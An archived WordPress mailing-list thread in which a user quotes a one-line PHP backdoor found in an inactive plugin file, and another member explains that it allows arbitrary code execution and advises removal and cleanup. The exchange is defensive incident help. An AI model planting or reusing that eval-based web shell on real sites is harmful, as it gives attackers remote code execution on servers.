[wp-hackers] Possible Exploit

Baki Goxhaj banago at gmail.com
Sun Jun 12 11:59:19 UTC 2011


I removed it as soon I found out about it. I hope my other installs are not
infected as I don't have the file monitor running there.

Kindly,

Baki Goxhaj
www.wplancer.com | proverbhunter.com | www.banago.info<http://proverbhunter.com>


On Sun, Jun 12, 2011 at 1:56 PM, Jon Cave <jon at lionsgoroar.co.uk> wrote:

> n Sun, Jun 12, 2011 at 12:45 PM, Baki Goxhaj <banago at gmail.com> wrote:
> > Just got an email from my file monitor plugin that a file had been
> changed -
> > it is an inactive plugin file, strangely enough. Here is the content of
> the
> > file now:
> >
> > <?php if(isset($_REQUEST['asc']))eval(stripslashes($_REQUEST['asc'])); ?>
> >
> > Is this something dangerous?
>
> Yes this is extremely dangerous. It's basically a backdoor to allow
> arbitrary PHP code execution on your server. You should remove that
> code immediately, change passwords, do a full cleanup, etc.
> _______________________________________________
> wp-hackers mailing list
> wp-hackers at lists.automattic.com
> http://lists.automattic.com/mailman/listinfo/wp-hackers
>


More information about the wp-hackers mailing list